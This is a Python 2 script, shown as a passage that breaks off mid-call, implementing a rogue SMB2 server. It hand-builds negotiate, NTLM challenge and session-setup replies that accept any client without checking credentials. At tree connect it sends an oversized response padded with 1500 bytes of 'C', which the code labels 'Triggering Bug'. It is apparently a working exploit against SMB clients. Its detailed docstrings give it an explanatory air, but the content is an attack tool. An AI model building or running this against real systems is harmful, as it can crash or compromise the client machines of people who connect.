
import sys, struct, SocketServer
from odict import OrderedDict
from datetime import datetime
from calendar import timegm

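class Packet():
    """Base class for the wire structures in this module.

    ``fields`` is an ordered mapping of field name -> raw byte string.  The
    serialization (``str(packet)``) is nothing more than the concatenation
    of the field values in declaration order, so the order of the entries
    in a subclass's ``fields`` *is* the wire layout.

    Keyword arguments override individual fields on the instance; the
    class-level defaults are copied, never mutated.  A callable value is
    invoked with the current default and its result is stored, which lets
    a caller derive a value from the default.

    Raises:
        KeyError: if a keyword names a field the packet does not declare.
            Without this check a mistyped field name would be appended at
            the very end of the serialization and silently shift the wire
            layout (the callable branch already raised KeyError for unknown
            names, so both branches now behave the same).
    """
    fields = OrderedDict([
        ("data", ""),
    ])

    def __init__(self, **kw):
        # Per-instance copy so overrides never leak into the class default.
        self.fields = OrderedDict(self.__class__.fields)
        for name, value in kw.items():
            if name not in self.fields:
                raise KeyError("%s has no field %r"
                               % (self.__class__.__name__, name))
            if callable(value):
                self.fields[name] = value(self.fields[name])
            else:
                self.fields[name] = value

    def __str__(self):
        """Serialize: every field value, in declaration order, concatenated."""
        return "".join(map(str, self.fields.values()))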

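def NTStamp(Time):
    """Encode a datetime as a little-endian 64-bit Windows FILETIME.

    A FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00 UTC;
    ``116444736000000000`` is the Unix epoch (1970-01-01) in that unit.

    Args:
        Time: a naive ``datetime``.  ``calendar.timegm`` treats the tuple
            as UTC, so pass ``datetime.utcnow()`` (or an aware value
            converted to UTC); a local-time ``datetime.now()`` comes out
            shifted by the host's UTC offset.

    Returns:
        The 8-byte packed value.  The byte order is pinned to little-endian
        (``"<Q"``): the bare ``"Q"`` format follows the host's native order
        and would produce a byte-swapped timestamp on a big-endian machine.

    Raises:
        struct.error: for datetimes before 1601 (the value would be negative).
    """
    hundred_ns = 116444736000000000 + timegm(Time.timetuple()) * 10000000
    return struct.pack("<Q", hundred_ns + Time.microsecond * 10)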

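def longueur(payload):
    """Build the 4-byte NetBIOS session-service header that prefixes an SMB
    message on TCP/445: a zero type byte followed by the big-endian 24-bit
    length of ``payload``.

    Args:
        payload: the message as a string, or an iterable of strings (joined
            before measuring, as before).

    Returns:
        ``struct.pack(">I", length)`` -- four bytes whose first byte is 0x00
        as long as the length fits in 24 bits.

    Raises:
        ValueError: if the payload exceeds 0xFFFFFF bytes.  The length field
            is only 24 bits wide; a larger value would spill into the type
            byte and silently produce a malformed frame.
    """
    if isinstance(payload, (str, bytes)):
        body = payload
    else:
        body = "".join(payload)
    length = len(body)
    if length > 0xFFFFFF:
        raise ValueError("payload too large for the NetBIOS length field: %d bytes"
                         % length)
    return struct.pack(">I", length)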

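def GrabMessageID(data):
    """Return the client's 8-byte SMB2 MessageId.

    ``data`` is a request exactly as read from the socket: the 4-byte NetBIOS
    session header followed by the 64-byte SMB2 header, so the MessageId
    (offset 24 of the SMB2 header) occupies bytes 28..35.  The value is
    echoed into the reply header unchanged.

    Raises:
        ValueError: if ``data`` is too short to contain the field.  A plain
            slice would return fewer than 8 bytes, and the caller would
            splice that into a fixed-layout header and send a malformed
            reply.
    """
    if len(data) < 36:
        raise ValueError("request too short for an SMB2 header: %d bytes" % len(data))
    return data[28:36]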

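def GrabCreditRequested(data):
    """Return the 2-byte credit count to grant in the reply.

    The value is the client's CreditRequest (SMB2 header offset 14, i.e.
    bytes 18..19 after the 4-byte NetBIOS header), except that a request
    for 0 credits is answered with 1 (``"\\x01\\x00"``) -- presumably so the
    client is never left without credits to send its next message.

    Raises:
        ValueError: if ``data`` does not reach the field (a short slice
            would otherwise be spliced into the reply header as-is).
    """
    if len(data) < 20:
        raise ValueError("request too short for an SMB2 header: %d bytes" % len(data))
    credits = data[18:20]
    if credits == "\x00\x00":
        return "\x01\x00"
    return credits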

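def GrabCreditCharged(data):
    """Return the client's 2-byte CreditCharge (SMB2 header offset 6, i.e.
    bytes 10..11 after the 4-byte NetBIOS header), echoed into the reply.

    Raises:
        ValueError: if ``data`` does not reach the field.
    """
    if len(data) < 12:
        raise ValueError("request too short for an SMB2 header: %d bytes" % len(data))
    return data[10:12]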

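def GrabSessionID(data):
    """Return the client's 8-byte SessionId (SMB2 header offset 40, i.e.
    bytes 44..51 after the 4-byte NetBIOS header), echoed into the reply so
    the client accepts it as belonging to its session.

    Raises:
        ValueError: if ``data`` does not reach the field; a truncated id
            would otherwise shorten the fixed 64-byte reply header.
    """
    if len(data) < 52:
        raise ValueError("request too short for an SMB2 header: %d bytes" % len(data))
    return data[44:52]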

#######################################################################=
###########
class SMBv2Header(Packet):
    """The 64-byte SMB2 packet header, in wire order.

    The defaults describe a server reply to a first message: status 0,
    command 0, one credit granted, Flags 0x00000001, zero MessageId, TreeId
    and SessionId.  The Signature is sixteen zero bytes -- nothing in this
    module signs messages.  The request handler overrides Cmd, MessageId,
    CreditCharge, Credits, NTStatus, TID and SessionID per message through
    keyword arguments.
    """
    fields = OrderedDict([
        ("Proto",         "\xfeSMB"),            # 0xFE 'S' 'M' 'B'
        ("Len",           "@\x00"),              # StructureSize = 0x0040 = 64
        ("CreditCharge",  "\x00\x00"),
        ("NTStatus",      "\x00" * 4),
        ("Cmd",           "\x00\x00"),
        ("Credits",       "\x01\x00"),
        ("Flags",         "\x01\x00\x00\x00"),
        ("NextCmd",       "\x00" * 4),
        ("MessageId",     "\x00" * 8),
        ("PID",           "\xff\xfe\x00\x00"),
        ("TID",           "\x00" * 4),
        ("SessionID",     "\x00" * 8),
        ("Signature",     "\x00" * 16),
    ])

#######################################################################=
###########
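class SMB2NegoAns(Packet):
    """SMB2 NEGOTIATE response body (sent right after an ``SMBv2Header``).

    The 64-byte fixed part (``Len`` .. ``Reserved2``) is followed by the
    SPNEGO security blob: a GSS-API InitialContextToken (tag 0x60) carrying
    the SPNEGO OID 1.3.6.1.5.5.2, a NegTokenInit whose mechTypes list names
    five mechanisms (NEGOEX, two Kerberos variants, Kerberos user-to-user
    and NTLMSSP -- see the comments on the OID fields) and a negHints
    element holding a GeneralString principal name.  Every ASN.1 element is
    encoded with the one-byte short length form.

    Kerberos is merely advertised here; the session-setup challenge that
    follows (``SMB2Session1Data``) answers with NTLMSSP only.

    ``Dialect`` defaults to 0x02FF; the handler overrides it with 0x0202 on
    the second negotiate.  ``SystemTime`` is stamped once, when the module
    is imported, and in UTC: ``NTStamp`` treats its argument as UTC, so a
    local ``datetime.now()`` would be shifted by the host's UTC offset.

    ``calculate()`` must be called before serializing: it derives
    ``SecBlobOffSet``/``SecBlobLen`` and every ASN.1 length byte from the
    actual field contents (several defaults below are stale and are simply
    overwritten).
    """
    fields = OrderedDict([
        ("Len",             "\x41\x00"),            # StructureSize 0x0041
        ("Signing",         "\x01\x00"),            # SecurityMode 0x0001
        ("Dialect",         "\xff\x02"),            # 0x02FF; handler sends 0x0202 later
        ("Reserved",        "\x00\x00"),
        ("Guid",            "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"),
        ("Capabilities",    "\x07\x00\x00\x00"),
        ("MaxTransSize",    "\x00\x00\x10\x00"),    # 0x00100000
        ("MaxReadSize",     "\x00\x00\x10\x00"),
        ("MaxWriteSize",    "\x00\x00\x10\x00"),
        ("SystemTime",      NTStamp(datetime.utcnow())),
        ("BootTime",        "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
        ("SecBlobOffSet",   "\x80\x00"),            # recomputed by calculate()
        ("SecBlobLen",      "\x78\x00"),            # recomputed by calculate()
        ("Reserved2",       "\x4d\x53\x53\x50"),    # "MSSP"
        # GSS-API InitialContextToken: 0x60 <len> { OID, [0] NegTokenInit }
        ("InitContextTokenASNId",     "\x60"),
        ("InitContextTokenASNLen",    "\x76"),
        ("ThisMechASNId",             "\x06"),
        ("ThisMechASNLen",            "\x06"),
        ("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),   # 1.3.6.1.5.5.2 SPNEGO
        ("SpNegoTokenASNId",          "\xA0"),
        ("SpNegoTokenASNLen",         "\x6c"),
        ("NegTokenASNId",             "\x30"),
        ("NegTokenASNLen",            "\x6a"),
        # [0] mechTypes: SEQUENCE OF OID
        ("NegTokenTag0ASNId",         "\xA0"),
        ("NegTokenTag0ASNLen",        "\x3c"),
        ("NegThisMechASNId",          "\x30"),
        ("NegThisMechASNLen",         "\x3a"),
        ("NegThisMech1ASNId",         "\x06"),
        ("NegThisMech1ASNLen",        "\x0a"),
        ("NegThisMech1ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),   # 1.3.6.1.4.1.311.2.2.30 NEGOEX
        ("NegThisMech2ASNId",         "\x06"),
        ("NegThisMech2ASNLen",        "\x09"),
        ("NegThisMech2ASNStr",        "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),       # 1.2.840.48018.1.2.2 MS KRB5
        ("NegThisMech3ASNId",         "\x06"),
        ("NegThisMech3ASNLen",        "\x09"),
        ("NegThisMech3ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),       # 1.2.840.113554.1.2.2 KRB5
        ("NegThisMech4ASNId",         "\x06"),
        ("NegThisMech4ASNLen",        "\x0a"),
        ("NegThisMech4ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),   # 1.2.840.113554.1.2.2.3 KRB5 user-to-user
        ("NegThisMech5ASNId",         "\x06"),
        ("NegThisMech5ASNLen",        "\x0a"),
        ("NegThisMech5ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),   # 1.3.6.1.4.1.311.2.2.10 NTLMSSP
        # [3] negHints: SEQUENCE { [0] GeneralString hintName }
        ("NegTokenTag3ASNId",         "\xA3"),
        ("NegTokenTag3ASNLen",        "\x2a"),
        ("NegHintASNId",              "\x30"),
        ("NegHintASNLen",             "\x28"),
        ("NegHintTag0ASNId",          "\xa0"),
        ("NegHintTag0ASNLen",         "\x26"),
        ("NegHintFinalASNId",         "\x1b"),       # GeneralString
        ("NegHintFinalASNLen",        "\x24"),
        ("NegHintFinalASNStr",        "Server2009@SMB3.local"),
        ("Data",                      ""),
    ])

    def _span(self, first, last):
        """Serialize the fields from *first* through *last* (inclusive, in
        declaration order).  Every length below is the size of such a span."""
        keys = list(self.fields.keys())
        start, stop = keys.index(first), keys.index(last)
        return "".join(str(self.fields[k]) for k in keys[start:stop + 1])

    def _short_len(self, n):
        """Encode *n* as an ASN.1 short-form length byte.

        Raises:
            ValueError: if *n* exceeds 127.  Bit 7 of the first length byte
                marks the long form, so packing a larger value into one byte
                would silently emit an invalid (differently parsed) length.
        """
        if n > 127:
            raise ValueError("ASN.1 element of %d bytes needs the long length form" % n)
        return struct.pack("B", n)

    def calculate(self):
        """Fill in every offset/length field from the actual field contents.

        Lengths are derived innermost first so each enclosing element
        reflects the size of the elements inside it (this also keeps
        ``NegThisMechASNLen``, the mechTypes SEQUENCE, in step with the OID
        list).  ``SecBlobOffSet`` is measured from the start of the SMB2
        header, hence ``+ 64`` for the header that precedes this body.
        """
        f = self.fields
        # Leaves: the OIDs and the principal-name hint.
        f["ThisMechASNLen"] = self._short_len(len(str(f["ThisMechASNStr"])))
        for i in range(1, 6):
            f["NegThisMech%dASNLen" % i] = self._short_len(
                len(str(f["NegThisMech%dASNStr" % i])))
        f["NegHintFinalASNLen"] = self._short_len(len(str(f["NegHintFinalASNStr"])))
        # mechTypes SEQUENCE and its [0] wrapper.
        f["NegThisMechASNLen"] = self._short_len(
            len(self._span("NegThisMech1ASNId", "NegThisMech5ASNStr")))
        f["NegTokenTag0ASNLen"] = self._short_len(
            len(self._span("NegThisMechASNId", "NegThisMech5ASNStr")))
        # negHints: [3] { SEQUENCE { [0] GeneralString } }.
        f["NegHintTag0ASNLen"] = self._short_len(
            len(self._span("NegHintFinalASNId", "NegHintFinalASNStr")))
        f["NegHintASNLen"] = self._short_len(
            len(self._span("NegHintTag0ASNId", "NegHintFinalASNStr")))
        f["NegTokenTag3ASNLen"] = self._short_len(
            len(self._span("NegHintASNId", "NegHintFinalASNStr")))
        # NegTokenInit SEQUENCE, its [0] wrapper, and the outer 0x60 token.
        f["NegTokenASNLen"] = self._short_len(
            len(self._span("NegTokenTag0ASNId", "NegHintFinalASNStr")))
        f["SpNegoTokenASNLen"] = self._short_len(
            len(self._span("NegTokenASNId", "NegHintFinalASNStr")))
        f["InitContextTokenASNLen"] = self._short_len(
            len(self._span("ThisMechASNId", "NegHintFinalASNStr")))
        # SMB2-level security-blob offset and length.
        blob = self._span("InitContextTokenASNId", "NegHintFinalASNStr")
        fixed = self._span("Len", "Reserved2")
        f["SecBlobOffSet"] = struct.pack("<H", len(fixed) + 64)
        f["SecBlobLen"] = struct.pack("<H", len(blob))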

#######################################################################=
###########
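class SMB2Session1Data(Packet):
    """SMB2 SESSION_SETUP response carrying the NTLMSSP CHALLENGE.

    After the 8-byte fixed part comes a SPNEGO NegTokenResp::

        a1 <len>                      [1] NegTokenResp
          30 <len>                    SEQUENCE
            a0 03 0a 01 01            negState: accept-incomplete
            a1 0c 06 0a <OID>         supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP)
            a2 <len> 04 <len> <body>  responseToken OCTET STRING

    where <body> is the NTLMSSP CHALLENGE_MESSAGE (type 2): fixed header,
    version block, workstation name and the AV_PAIR target-info list.
    Whatever the negotiate advertised, this reply selects NTLMSSP, so a
    client that follows SPNEGO continues with NTLM.

    Security-relevant caveats:
      * ``NTLMSSPNtServerChallenge`` is a constant 8-byte value.  A real
        authenticator must send a fresh, unpredictable challenge per
        session; with a static one, captured responses are replayable and
        precomputable.
      * The MsvAvTimestamp AV pair (id 7) is stamped once at import time,
        in UTC (``NTStamp`` treats its argument as UTC).
      * The Unicode strings must be ASCII: ``str.encode("utf-16le")`` on a
        Python 2 byte string decodes it as ASCII first.

    ``calculate()`` must be called exactly once before serializing: it
    UTF-16LE-encodes the strings and derives every length and offset from
    the actual contents.  The ASN.1 lengths use the file's two-field form
    (a length-of-length byte 0x81/0x82 followed by a 1- or 2-byte length);
    they are computed innermost-first so that a switch between the one- and
    two-byte form in an inner element is reflected in every enclosing
    length and in the length-of-length byte that announces it.
    """
    fields = OrderedDict([
        ("Len",             "\x09\x00"),    # StructureSize 0x0009
        ("SessionFlag",     "\x01\x00"),
        ("SecBlobOffSet",   "\x48\x00"),    # recomputed by calculate()
        ("SecBlobLen",      "\x06\x01"),    # recomputed by calculate()
        ("ChoiceTagASNId",        "\xa1"),
        ("ChoiceTagASNLenOfLen",  "\x82"),
        ("ChoiceTagASNIdLen",     "\x01\x02"),
        ("NegTokenTagASNId",      "\x30"),
        ("NegTokenTagASNLenOfLen","\x81"),
        ("NegTokenTagASNIdLen",   "\xff"),
        ("Tag0ASNId",             "\xA0"),
        ("Tag0ASNIdLen",          "\x03"),
        ("NegoStateASNId",        "\x0A"),
        ("NegoStateASNLen",       "\x01"),
        ("NegoStateASNValue",     "\x01"),  # accept-incomplete
        ("Tag1ASNId",             "\xA1"),
        ("Tag1ASNIdLen",          "\x0c"),
        ("Tag1ASNId2",            "\x06"),
        ("Tag1ASNId2Len",         "\x0A"),
        ("Tag1ASNId2Str",         "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),   # NTLMSSP OID
        ("Tag2ASNId",             "\xA2"),
        ("Tag2ASNIdLenOfLen",     "\x81"),
        ("Tag2ASNIdLen",          "\xE9"),
        ("Tag3ASNId",             "\x04"),
        ("Tag3ASNIdLenOfLen",     "\x81"),
        ("Tag3ASNIdLen",          "\xE6"),
        # NTLMSSP CHALLENGE_MESSAGE
        ("NTLMSSPSignature",      "NTLMSSP"),
        ("NTLMSSPSignatureNull",  "\x00"),
        ("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
        ("NTLMSSPNtWorkstationLen","\x1e\x00"),
        ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
        ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
        ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
        ("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"),   # static -- see docstring
        ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("NTLMSSPNtTargetInfoLen","\x94\x00"),
        ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
        ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
        ("NegTokenInitSeqMechMessageVersionHigh","\x06"),      # version 6.3
        ("NegTokenInitSeqMechMessageVersionLow","\x03"),
        ("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"), # build 0x2580 = 9600
        ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
        ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
        ("NTLMSSPNtWorkstationName","SMB3"),
        # AV_PAIR list (id, len, value); ids per MS-NLMP: 2 NbDomainName,
        # 1 NbComputerName, 4 DnsDomainName, 3 DnsComputerName,
        # 5 DnsTreeName, 7 Timestamp, 0 EOL.
        ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
        ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
        ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
        ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
        ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"),
        ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
        ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"),
        ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
        ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
        ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"),
        ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
        ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
        ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
        ("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
        ("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
        ("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.utcnow())),
        ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
        ("NTLMSSPNTLMCh
allengeAVPairs6Len","\x00\x00"),
    ])

    # Strings that calculate() converts to UTF-16LE (the timestamp in AV
    # pair 7 is already binary and is left alone).
    _UNICODE_FIELDS = (
        "NTLMSSPNtWorkstationName",
        "NTLMSSPNTLMChallengeAVPairsUnicodeStr",
        "NTLMSSPNTLMChallengeAVPairs1UnicodeStr",
        "NTLMSSPNTLMChallengeAVPairs2UnicodeStr",
        "NTLMSSPNTLMChallengeAVPairs3UnicodeStr",
        "NTLMSSPNTLMChallengeAVPairs5UnicodeStr",
    )
    # Suffixes of the AV pairs that carry a variable-length value.
    _AV_PAIRS = ("", "1", "2", "3", "5", "7")
    _LAST = "NTLMSSPNTLMChallengeAVPairs6Len"

    def _span(self, first, last):
        """Serialize the fields from *first* through *last* (inclusive, in
        declaration order)."""
        keys = list(self.fields.keys())
        start, stop = keys.index(first), keys.index(last)
        return "".join(str(self.fields[k]) for k in keys[start:stop + 1])

    def _asn_len(self, n):
        """Encode *n* in the layout's two-field form.

        Returns:
            ``(length_of_length, length_bytes)``: ``("\\x81", 1 byte)`` for
            values up to 255, ``("\\x82", 2 bytes big-endian)`` above that.

        Raises:
            ValueError: above 65535, which the layout cannot express.
        """
        if n > 0xFFFF:
            raise ValueError("ASN.1 element of %d bytes exceeds the 2-byte length form" % n)
        if n > 0xFF:
            return "\x82", struct.pack(">H", n)
        return "\x81", struct.pack(">B", n)

    def calculate(self):
        """Encode the strings and derive every length and offset in place."""
        f = self.fields
        # 1. Unicode strings.
        for key in self._UNICODE_FIELDS:
            f[key] = f[key].encode("utf-16le")
        # 2. AV_PAIR value lengths (2-byte little-endian each).
        for suffix in self._AV_PAIRS:
            value = str(f["NTLMSSPNTLMChallengeAVPairs%sUnicodeStr" % suffix])
            f["NTLMSSPNTLMChallengeAVPairs%sLen" % suffix] = struct.pack("<H", len(value))
        # 3. Workstation and TargetInfo: length/maxlength/offset triplets.
        #    Offsets count from the start of the NTLMSSP signature; the
        #    workstation name follows the version block and the AV pairs
        #    follow the workstation name.
        header = self._span("NTLMSSPSignature", "NegTokenInitSeqMechMessageVersionNTLMType")
        workstation = str(f["NTLMSSPNtWorkstationName"])
        av_pairs = self._span("NTLMSSPNTLMChallengeAVPairsId", self._LAST)
        f["NTLMSSPNtWorkstationLen"] = struct.pack("<H", len(workstation))
        f["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<H", len(workstation))
        f["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<I", len(header))
        f["NTLMSSPNtTargetInfoLen"] = struct.pack("<H", len(av_pairs))
        f["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<H", len(av_pairs))
        f["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<I", len(header) + len(workstation))
        # 4. ASN.1 lengths, innermost first.
        ntlm = self._span("NTLMSSPSignature", self._LAST)
        f["Tag3ASNIdLenOfLen"], f["Tag3ASNIdLen"] = self._asn_len(len(ntlm))
        f["Tag2ASNIdLenOfLen"], f["Tag2ASNIdLen"] = self._asn_len(
            len(self._span("Tag3ASNId", self._LAST)))
        f["Tag1ASNId2Len"] = struct.pack(">B", len(str(f["Tag1ASNId2Str"])))
        f["Tag1ASNIdLen"] = struct.pack(">B", len(self._span("Tag1ASNId2", "Tag1ASNId2Str")))
        f["NegTokenTagASNLenOfLen"], f["NegTokenTagASNIdLen"] = self._asn_len(
            len(self._span("Tag0ASNId", self._LAST)))
        f["ChoiceTagASNLenOfLen"], f["ChoiceTagASNIdLen"] = self._asn_len(
            len(self._span("NegTokenTagASNId", self._LAST)))
        # 5. SMB2-level security-blob offset (from the start of the SMB2
        #    header, hence + 64) and length.
        blob = self._span("ChoiceTagASNId", self._LAST)
        fixed = self._span("Len", "SecBlobLen")
        f["SecBlobOffSet"] = struct.pack("<H", len(fixed) + 64)
        f["SecBlobLen"] = struct.pack("<H", len(blob))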

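class SMB2SessionAcceptData(Packet):
    """Final SMB2 SESSION_SETUP response: SPNEGO NegTokenResp with negState
    accept-completed and a mechListMIC element.

    Layout after the 8-byte fixed part::

        a1 <len> 30 <len> { a0 03 0a 01 00 ; a3 <len> 04 <len> <MIC> }

    The three ``Mechlist*`` fields are empty by default, so the MIC OCTET
    STRING goes out with length 0; the stale defaults 0x1b/0x19/0x12/0x10
    correspond to a 16-byte MIC.  The source notes that the client does not
    verify the MIC.  The mechListMIC is what lets a peer detect tampering
    with the negotiated mechanism list, so a client that accepts this reply
    is not enforcing it and its negotiation is unauthenticated.

    No credential is checked anywhere before this reply is sent.

    All ASN.1 lengths use the one-byte short form; ``calculate()`` refuses
    to emit a value above 127 (bit 7 announces the long form), which even
    a full 16-byte MIC does not reach (the outer element is then 27 bytes).
    ``SecBlobOffSet`` is not recomputed: the fixed part is 8 bytes, so the
    default 0x48 (8 + 64-byte header) is already right.
    """
    fields = OrderedDict([
        ("Len",                       "\x09\x00"),
        ("SessionFlag",               "\x01\x00"),
        ("SecBlobOffSet",             "\x48\x00"),
        ("SecBlobLen",                "\x1d\x00"),
        ("SecBlobTag0",               "\xa1"),
        ("SecBlobTag0Len",            "\x1b"),
        ("NegTokenResp",              "\x30"),
        ("NegTokenRespLen",           "\x19"),
        ("NegTokenRespTag0",          "\xa0"),
        ("NegTokenRespTag0Len",       "\x03"),
        ("NegStateResp",              "\x0a"),
        ("NegTokenRespLen1",           "\x01"),
        ("NegTokenRespStr",           "\x00"),      # accept-completed
        ("SecBlobTag3",               "\xa3"),
        ("SecBlobTag3Len",            "\x12"),
        ("SecBlobOctetHeader",        "\x04"),
        ("SecBlobOctetLen",           "\x10"),
        ("MechlistMICVersion",        ""),          # No verification on the client side...
        ("MechlistCheckSum",          ""),
        ("MechlistSeqNumber",         ""),
        ("Data",                      ""),
    ])

    _LAST = "MechlistSeqNumber"   # last field inside the security blob

    def _span(self, first, last):
        """Serialize the fields from *first* through *last* (inclusive, in
        declaration order)."""
        keys = list(self.fields.keys())
        start, stop = keys.index(first), keys.index(last)
        return "".join(str(self.fields[k]) for k in keys[start:stop + 1])

    def _short_len(self, n):
        """Encode *n* as an ASN.1 short-form length byte.

        Raises:
            ValueError: if *n* exceeds 127; a one-byte value with bit 7 set
                would be parsed as a long-form length, not as *n*.
        """
        if n > 127:
            raise ValueError("ASN.1 element of %d bytes needs the long length form" % n)
        return struct.pack("B", n)

    def calculate(self):
        """Derive the blob length and every ASN.1 length, innermost first."""
        f = self.fields
        mic = self._span("MechlistMICVersion", self._LAST)
        f["SecBlobOctetLen"] = self._short_len(len(mic))
        f["SecBlobTag3Len"] = self._short_len(
            len(self._span("SecBlobOctetHeader", self._LAST)))
        f["NegTokenRespLen"] = self._short_len(
            len(self._span("NegTokenRespTag0", self._LAST)))
        f["SecBlobTag0Len"] = self._short_len(
            len(self._span("NegTokenResp", self._LAST)))
        f["SecBlobLen"] = struct.pack("<H", len(self._span("SecBlobTag0", self._LAST)))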

class SMB2TreeData(Packet):
    """SMB2 TREE_CONNECT response body: 16 bytes of fixed fields plus ``Data``.

    ``Len`` is the StructureSize, 0x0010.  ``Data`` is empty by default; the
    request handler fills it with 1500 bytes of "C", which is the oversized
    response its log line calls "Triggering Bug".
    """
    fields = OrderedDict([
        ("Len",               "\x10\x00"),
        ("ShareType",         "\x02\x00"),
        ("ShareFlags",        "0\x00\x00\x00"),     # 0x00000030
        ("ShareCapabilities", "\x00" * 4),
        ("AccessMask",        "\xff\x01\x1f\x01"),
        ("Data",              ""),
    ])

#######################################################################=
###
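class SMB2(SocketServer.BaseRequestHandler):
    """One TCP/445 conversation: walk the client through SMB2 negotiate,
    NTLM session setup and tree connect, then send the oversized
    TREE_CONNECT response that the script exists to deliver.

    Each stage is selected by the command at bytes 16..17 of the most
    recently received message (SMB2 header offset 12 after the 4-byte
    NetBIOS header); stages are checked in sequence, so a client that
    skips one simply gets no further reply:

      * SMB1 NEGOTIATE (protocol byte 0xFF at offset 4, command 0x72):
        answered with an SMB2 negotiate response (MessageId 0) so the
        client re-negotiates as SMB2.
      * SMB2 NEGOTIATE (command 0): negotiate response, dialect 0x0202.
      * SESSION_SETUP (command 1), first leg: NTLM CHALLENGE with status
        0xC0000016 (STATUS_MORE_PROCESSING_REQUIRED) and a fixed session id.
      * SESSION_SETUP, second leg (low byte of MessageId equal to 2):
        accepted unconditionally -- no credential is ever verified.
      * TREE_CONNECT (command 3): the 16-byte response followed by 1500
        bytes of "C" (the "//BUG" line).

    Requests are read as whole NetBIOS-framed messages and replies go out
    with ``sendall``, so a partial read or a partial send can no longer
    yield a truncated frame.  Any error (timeout, closed socket, malformed
    request rejected by the Grab* helpers) ends the handler and is reported
    on stdout with its reason instead of being swallowed.
    """

    # Width of the NetBIOS session-service length field (24 bits).
    MAX_MESSAGE = 0xFFFFFF

    def _recv_exact(self, size):
        """Read *size* bytes, looping over short reads.

        Returns fewer bytes only if the peer closes the connection.  A
        timeout (``settimeout(1)`` in ``handle``) raises and is reported by
        ``handle``'s except clause.
        """
        chunks = []
        remaining = size
        while remaining > 0:
            chunk = self.request.recv(remaining)
            if not chunk:
                break
            chunks.append(chunk)
            remaining -= len(chunk)
        return "".join(chunks)

    def _recv_message(self):
        """Read one NetBIOS-framed SMB message and return header + body.

        The 4-byte header is kept in the result because every offset used
        by the Grab* helpers and the ``data[16:18]`` command checks counts
        from it.  A single ``recv(1024)`` could return part of a message (or
        more than one), which is why the length field is honoured instead.
        Returns whatever was read (possibly "") if the peer closes early.
        """
        header = self._recv_exact(4)
        if len(header) < 4:
            return header
        length = struct.unpack(">I", header)[0] & self.MAX_MESSAGE
        return header + self._recv_exact(length)

    def _reply(self, head, body, message):
        """Log *message*, send ``head`` + ``body`` as one framed SMB message
        and return the client's next message.

        ``sendall`` is used because ``socket.send`` may write only part of
        the buffer and return the count, which the original ignored.
        """
        packet = str(head) + str(body)
        sys.stdout.write("[*]%s\n" % message)
        self.request.sendall(longueur(packet) + packet)
        return self._recv_message()

    def handle(self):
        try:
            self.request.settimeout(1)
            sys.stdout.write("From: %s\n" % (self.client_address,))
            data = self._recv_message()

            # SMB1 NEGOTIATE: reply with an SMB2 negotiate response so the
            # client comes back as SMB2.
            if data[8:10] == "\x72\x00" and data[4:5] == "\xff":
                head = SMBv2Header(CreditCharge="\x00\x00", Credits="\x01\x00",
                                   PID="\x00\x00\x00\x00")
                body = SMB2NegoAns()
                body.calculate()
                data = self._reply(head, body, "Negotiating SMBv2.")

            # SMB2 NEGOTIATE (command 0): dialect 0x0202.
            if data[16:18] == "\x00\x00":
                head = SMBv2Header(MessageId=GrabMessageID(data),
                                   PID="\xff\xfe\x00\x00",
                                   CreditCharge=GrabCreditCharged(data),
                                   Credits=GrabCreditRequested(data))
                body = SMB2NegoAns(Dialect="\x02\x02")
                body.calculate()
                data = self._reply(head, body, "Negotiate Protocol SMBv2 packet sent.")

            # SESSION_SETUP (command 1), first leg: NTLM CHALLENGE, status
            # 0xC0000016 ("more processing required"), fixed session id.
            if data[16:18] == "\x01\x00":
                head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data),
                                   PID="\xff\xfe\x00\x00",
                                   CreditCharge=GrabCreditCharged(data),
                                   Credits=GrabCreditRequested(data),
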